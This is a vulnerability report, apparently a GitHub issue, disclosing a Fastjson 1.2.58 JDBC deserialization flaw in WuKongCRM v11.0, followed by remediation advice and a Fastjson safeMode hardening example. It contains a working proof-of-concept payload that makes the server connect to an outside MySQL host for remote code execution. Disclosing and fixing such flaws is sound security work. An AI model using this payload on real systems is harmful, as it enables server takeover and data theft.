WuKongCRM v11.0 Fastjson JDBC Deserialization Vulnerability (CWE-502) #27

@ez-lbz

Summary

WuKongCRM v11.0 is vulnerable to a Fastjson JDBC deserialization vulnerability because it still ships Fastjson version 1.2.58. A similar vulnerability was previously reported in WuKongCRM v9.0.1 (reference), which the developers attempted to mitigate by removing the xbean dependency and disabling AutoType. The core issue remains, however, because the Fastjson library itself was never upgraded, so the application is still susceptible to deserialization-based remote code execution (RCE).

The project further includes mysql-connector-java 8.0.19 and jackson-databind 2.10.2, which can be chained together to achieve RCE.

Details

Because the application parses untrusted input with the outdated Fastjson 1.2.58 parser, attackers can trigger malicious gadget chains. A proof-of-concept exploit was demonstrated using the following steps:

  1. Start a fake MySQL server using the javachains toolkit.
  2. Select the Jackson + TemplatesImpl gadget chain to generate a malicious payload.
  3. Send a specially crafted payload to one of the numerous deserialization sinks present in WuKongCRM v11.0.

package org.example;

import static com.alibaba.fastjson.JSON.parseObject;

public class Main {
    public static void main(String[] args) {
        String Json = "{\n" +
                "    \"@type\": \"java.lang.AutoCloseable\",\n" +
                "    \"@type\": \"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection\",\n" +
                "    \"proxy\": {\n" +
                "        \"@type\": \"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy\",\n" +
                "        \"connectionUrl\": {\n" +
                "            \"@type\": \"com.mysql.cj.conf.url.ReplicationConnectionUrl\",\n" +
                "            \"masters\": [\n" +
                "                {\n" +
                "                    \"host\": \"123.57.23.40\"\n" +
                "                }\n" +
                "            ],\n" +
                "            \"slaves\": [],\n" +
                "            \"properties\": {\n" +
                "                \"host\": \"123.57.23.40\",\n" +
                "                \"user\": \"df8a76b\",\n" +
                "                \"dbname\": \"dbname\",\n" +
                "                \"password\": \"pass\",\n" +
                "                \"queryInterceptors\": \"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\",\n" +
                "                \"autoDeserialize\": \"true\",\n" +
                "                \"allowLoadLocalInfile\": \"true\"\n" +
                "            }\n" +
                "        }\n" +
                "    }\n" +
                "}";
        parseObject(Json);
    }
}

  4. Upon successful exploitation, arbitrary code execution is achieved, demonstrated by popping the calculator.

The project contains a significant number of potential deserialization entry points, and tools such as CodeQL can be used to enumerate these vulnerable locations quickly.

Impact

  • Remote Code Execution (RCE) on the application server

  • Complete system compromise, including data exfiltration or further lateral movement within the internal network

  • High risk due to multiple deserialization sinks and default vulnerable configuration

Root Cause

  • Use of outdated Fastjson 1.2.58 vulnerable to unsafe deserialization

  • Inadequate patching strategy that disabled some features but did not remove or upgrade vulnerable components

Recommendation

  • Upgrade Fastjson to 1.2.83 or newer.

  • Validate all deserialization inputs to ensure only trusted data is processed.

  • Audit code for unsafe deserialization sinks and apply strict allowlists or alternative serialization frameworks.
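The following is an added example, not WuKongCRM's code, of what the first two recommendations look like in practice. It assumes Fastjson has been upgraded to 1.2.83 (the safeMode switch it relies on exists from 1.2.68 onward and is absent in the 1.2.58 the project ships), and the com.example.* names, the ContactRequest class and the sample inputs are all constructed for illustration:

```java
// Added example (not WuKongCRM's code): hardening Fastjson parsing against
// "@type"-driven deserialization. Assumes Fastjson >= 1.2.83 on the classpath;
// the com.example.* names and the ContactRequest type are hypothetical.
package com.example.hardening;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

public class SafeJsonParsing {

    // Plain data holder: the only shape the endpoint is willing to accept.
    public static class ContactRequest {
        private String name;
        private String email;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
        public String getEmail() { return email; }
        public void setEmail(String email) { this.email = email; }
    }

    // Call once at application start-up. safeMode disables AutoType entirely,
    // so any "@type" key in the input is rejected before a class is resolved,
    // independent of the allow/deny lists that earlier versions relied on.
    public static void hardenFastjson() {
        ParserConfig.getGlobalInstance().setSafeMode(true);
    }

    // Parse into a concrete, explicitly named class instead of calling
    // JSON.parseObject(String) with no target type (the pattern in the PoC):
    // the parser never chooses an implementation class from untrusted input.
    public static ContactRequest parseContact(String body) {
        return JSON.parseObject(body, ContactRequest.class);
    }

    public static void main(String[] args) {
        hardenFastjson();

        // Constructed benign input: parses normally into the declared type.
        String ok = "{\"name\":\"alice\",\"email\":\"alice@example.org\"}";
        ContactRequest req = parseContact(ok);
        System.out.println("accepted: " + req.getName() + " <" + req.getEmail() + ">");

        // Constructed input carrying an "@type" key. The class name is a
        // placeholder: under safeMode the presence of the key is what is refused.
        String typed = "{\"@type\":\"com.example.NotAllowed\",\"name\":\"x\"}";
        try {
            parseContact(typed);
            System.out.println("BUG: @type input was accepted");
        } catch (JSONException e) {
            // Fastjson raises "safeMode not support autoType : ..." here.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

safeMode is a process-wide setting on the global ParserConfig, so it should be enabled before any request is parsed and its effect checked across the whole code base: any legitimate use of polymorphic "@type" fields will start failing, which is usually the point at which the remaining untyped JSON.parseObject(String) sinks found by a CodeQL-style audit get converted to typed parsing as shown above.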
